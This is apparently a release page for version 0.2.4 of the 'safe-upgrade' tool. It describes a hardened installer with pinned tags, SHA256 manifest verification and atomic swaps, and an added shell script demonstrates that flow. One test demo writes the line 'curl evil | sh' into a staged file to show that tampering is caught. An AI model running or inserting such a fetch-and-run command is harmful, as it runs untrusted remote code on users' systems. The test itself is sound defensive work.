
v0.2.4 — harden the script installer


sharkyger released this 09 Jun 21:45 · 8 commits to main since this release · tag v0.2.4 · commit 2bf07d7

The curl | bash script installer now pins to an immutable release tag and
verifies every file against a published SHA256 manifest before anything is
installed — bringing the script route in line with the integrity guarantees the
Homebrew tap route already provides.

Changed

  • Pinned, not moving. Downloads come from an immutable release tag, never the
    main branch — a curl | bash run always gets exactly one published release.
  • Verify before install. A published SHA256SUMS manifest drives the release
    file set; every file is staged and checksum-verified before anything lands in
    your Homebrew bin. A truncated, tampered, or missing file aborts the whole
    install — no partial state.
  • Atomic, same-filesystem swap and a fail-closed completeness floor so a
    truncated manifest can't yield a "successful" partial install.
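The three items above describe one flow: download for a pinned tag, verify the staged files against the manifest, enforce a completeness floor, then swap into place. As an added illustration (this is not the project's installer, whose source is not on this page), the shell below implements that flow in simplified form. It assumes sha256sum or shasum is available, uses a placeholder base URL and tag for the fetch step, and stands in for the "completeness floor" with a per-release minimum file count passed by the caller; the sample release it verifies is constructed inline so the whole thing runs offline.

```shell
#!/usr/bin/env bash
# Added example, not the project's installer: a simplified sketch of the
# verify-before-install flow the release notes describe. The manifest drives
# the file set, every file is checked before anything is installed, a
# completeness floor rejects a truncated manifest, and files reach the
# destination only through a same-filesystem rename.
set -eu

# Hex SHA-256 of one file; sha256sum on Linux, shasum on macOS.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  else
    shasum -a 256 "$1" | awk '{print $1}'
  fi
}

# fetch_release BASE_URL TAG STAGE_DIR
# Fetch SHA256SUMS for an immutable release tag, then only the files it lists.
# BASE_URL (e.g. https://github.com/OWNER/REPO) is a placeholder; the real
# download location is not given on this page. Not exercised offline.
fetch_release() {
  local base="$1/releases/download/$2" stage="$3" name _
  curl -fsSL -o "$stage/SHA256SUMS" "$base/SHA256SUMS"
  while read -r _ name; do
    [ -n "$name" ] || continue
    name="${name#\*}"
    curl -fsSL -o "$stage/$name" "$base/$name"
  done < "$stage/SHA256SUMS"
}

# verify_staged STAGE_DIR MIN_FILES
# Succeeds only if every manifest entry is present and matches, and the
# manifest lists at least MIN_FILES entries. MIN_FILES is an assumed
# per-release constant standing in for the "completeness floor".
verify_staged() {
  local stage="$1" min_files="$2" manifest="$1/SHA256SUMS"
  local count=0 expected name actual
  [ -f "$manifest" ] || { echo "missing manifest" >&2; return 1; }
  while read -r expected name; do
    [ -n "$expected" ] || continue
    name="${name#\*}"          # tolerate the "*file" binary-mode marker
    count=$((count + 1))
    [ -f "$stage/$name" ] || { echo "missing: $name" >&2; return 1; }
    actual="$(sha256_of "$stage/$name")"
    [ "$actual" = "$expected" ] || { echo "mismatch: $name" >&2; return 1; }
  done < "$manifest"
  [ "$count" -ge "$min_files" ] \
    || { echo "manifest lists $count files, floor is $min_files" >&2; return 1; }
}

# install_release STAGE_DIR DEST_DIR MIN_FILES
# Verify first; only then copy into a scratch dir inside DEST_DIR and rename
# each listed file into place, so a reader of DEST_DIR never sees a
# half-written file and nothing is created at all if verification fails.
install_release() {
  local stage="$1" dest="$2" min_files="$3" tmp name _
  verify_staged "$stage" "$min_files" || return 1
  mkdir -p "$dest"
  tmp="$(mktemp -d "$dest/.staging.XXXXXX")"   # same filesystem as DEST_DIR
  cp -R "$stage/." "$tmp/"
  while read -r _ name; do
    [ -n "$name" ] || continue
    name="${name#\*}"
    mv -f "$tmp/$name" "$dest/$name"
  done < "$stage/SHA256SUMS"
  rm -rf "$tmp"
}

# --- constructed sample release for offline demonstration -------------------

# make_release DIR: two placeholder files plus a manifest in sha256sum format.
make_release() {
  printf '#!/bin/sh\necho safe-upgrade\n' > "$1/safe-upgrade"
  printf 'helper contents\n' > "$1/lib.sh"
  : > "$1/SHA256SUMS"
  for f in safe-upgrade lib.sh; do
    printf '%s  %s\n' "$(sha256_of "$1/$f")" "$f" >> "$1/SHA256SUMS"
  done
}

# Intact release installs; both files land in DEST.
demo_good() {
  local work; work="$(mktemp -d)"; mkdir "$work/stage"
  make_release "$work/stage"
  install_release "$work/stage" "$work/bin" 2 \
    && [ -f "$work/bin/safe-upgrade" ] && [ -f "$work/bin/lib.sh" ]
}

# A file altered after the manifest was published is rejected; nothing lands.
demo_tampered_rejected() {
  local work; work="$(mktemp -d)"; mkdir "$work/stage"
  make_release "$work/stage"
  printf 'curl evil | sh\n' >> "$work/stage/safe-upgrade"
  ! install_release "$work/stage" "$work/bin" 2 2>/dev/null \
    && [ ! -e "$work/bin/safe-upgrade" ]
}

# A manifest truncated to one line fails the floor of 2 even though the one
# remaining entry verifies, so no partial install is produced.
demo_truncated_rejected() {
  local work; work="$(mktemp -d)"; mkdir "$work/stage"
  make_release "$work/stage"
  head -n 1 "$work/stage/SHA256SUMS" > "$work/stage/m"
  mv "$work/stage/m" "$work/stage/SHA256SUMS"
  ! install_release "$work/stage" "$work/bin" 2 2>/dev/null \
    && [ ! -e "$work/bin/lib.sh" ]
}
```

The order matters: the destination directory is not even created until the whole staged set has passed, the scratch directory sits inside the destination so each mv is a rename rather than a copy across filesystems, and the floor is checked after the per-file loop so a manifest that has simply lost its tail cannot pass by listing fewer files.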

Fixed

  • Single-source version. pyproject.toml is realigned with the VERSION
    file, with CI keeping them — and the installer's pinned tag — in lockstep.

Tests / CI

  • A new hermetic end-to-end install smoke test runs the real installer over a
    local server in CI on Linux (bash 5) and macOS (bash 3.2) — the script-install
    route is exercised in CI for the first time. Full suite: 151 passing.

Trust model: the manifest and files travel over the same TLS channel, so the
checksums are defense-in-depth (transfer integrity + tag immutability) on top of
HTTPS, not a replacement for it. They catch a truncated or corrupted download and
pin the file set to the tag; they do not authenticate the publisher, since anyone
able to replace the release assets could replace the manifest alongside them. The
Homebrew tap route was already immutable and is unaffected —
brew install sharkyger/tap/safe-upgrade.

See CHANGELOG.md for full history.